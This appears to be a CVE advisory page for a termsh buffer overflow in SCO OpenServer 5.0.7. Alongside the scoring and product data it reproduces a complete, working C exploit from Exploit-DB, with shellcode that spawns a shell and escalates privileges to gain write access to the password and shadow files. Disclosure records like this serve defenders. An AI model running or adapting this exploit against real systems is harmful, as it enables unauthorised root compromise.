Notifications for a CVE
Stay informed of any changes for a specific CVE.
CVE Descriptions
Buffer overflow in termsh on SCO OpenServer 5.0.7 allows remote attackers to execute arbitrary code via a long -o command line argument. NOTE: this is probably a different vulnerability than CVE-2005-0351 since it involves a distinct attack vector.
CVE Informations
Metrics
| Metrics | Score | Severity | CVSS Vector | Source |
|---|---|---|---|---|
| V2 | 7.5 | AV:N/AC:L/Au:N/C:P/I:P/A:P | nvd@nist.gov |
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
EPSS Percentile
The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
Exploit information
Exploit Database EDB-ID : 1402
Publication date : 2006-01-02 23h00 +00:00
Author : prdelka
EDB Verified : Yes
/* SCO Openserver 5.0.7 termsh exploit
* ===================================
* 'termsh' is a program to view or modify an existing terminal entry on
* SCO Openserver. A stack based overflow exists in the handling of command
* line arguements, namely the [-o oadir] arguement. It is installed setgid
* auth in a default SCO Openserver 5.0.7 install. An attacker may use this
* flaw to gain write access to /etc/passwd or /etc/shadow allowing for
* local root compromise.
*
* Example use.
* $ id
* uid=200(user) gid=50(group) groups=50(group)
* $ uname -a
* SCO_SV scosysv 3.2 5.0.7 i386
* $ gcc prdelka-vs-SCO-termshx.c -o prdelka-vs-SCO-termshx
* $ ./prdelka-vs-SCO-termshx /opt/K/SCO/Unix/5.0.7Hw/usr/lib/sysadm/termsh
* [ SCO Openserver 5.0.7 termsh local privilege escalation exploit
* $ id
* uid=200(user) gid=50(group) egid=21(auth) groups=50(group)
*
* - prdelka
*/
#include <stdio.h>
#include <stdlib.h>
char shellcode[]="\x90\x90\x90\x90\x90\x90\x90\x90"
"\x68\xff\xf8\xff\x3c\x6a\x65\x89"
"\xe6\xf7\x56\x04\xf6\x16\x31\xc0"
"\x50\x68""/ksh""\x68""/bin""\x89"
"\xe3\x50\x50\x53\xb0\x3b\xff\xd6";
int main(int argc,char* argv[])
{
char* buffer;
char* arg = "-o";
char *env[] = {"HISTORY=/dev/null",NULL};
long eip,ptr;
int i;
printf("[ SCO Openserver 5.0.7 termsh local privilege escalation exploit\n");
if(argc < 2)
{
printf("[ Error : [path]\n[ Example: %s /opt/K/SCO/Unix/5.0.7Hw/usr/lib/sysadm/termsh\n",argv[0]);
exit(0);
}
eip = 0xa2080853;
buffer = malloc(7449 + strlen(shellcode));
memset(buffer,'\x00',7449 + strlen(shellcode));
ptr = (long)buffer + strlen(shellcode);
strncpy(buffer,shellcode,strlen(shellcode));
for(i = 1;i <= 1862;i++)
{
memcpy((char*)ptr,(char*)&eip,4);
ptr = ptr + 4;
}
execle(argv[1],argv[1],arg,buffer,NULL,env);
exit(0);
}
// milw0rm.com [2006-01-03]
Products Mentioned
Configuraton 0
Sco>>Openserver >> Version 5.0
Sco>>Openserver >> Version 5.0.1
Sco>>Openserver >> Version 5.0.2
Sco>>Openserver >> Version 5.0.3
Sco>>Openserver >> Version 5.0.4
Sco>>Openserver >> Version 5.0.5
Sco>>Openserver >> Version 5.0.6
- Sco>>Openserver >> Version 5.0.6 (Open CPE detail)
Sco>>Openserver >> Version 5.0.6a
Sco>>Openserver >> Version 5.0.7
- Sco>>Openserver >> Version 5.0.7 (Open CPE detail)
References
http://downloads.securityfocus.com/vulnerabilities/exploits/Openserver_bof.c
Tags : x_refsource_MISC
Tags : x_refsource_MISC
2025©
tesweb SA
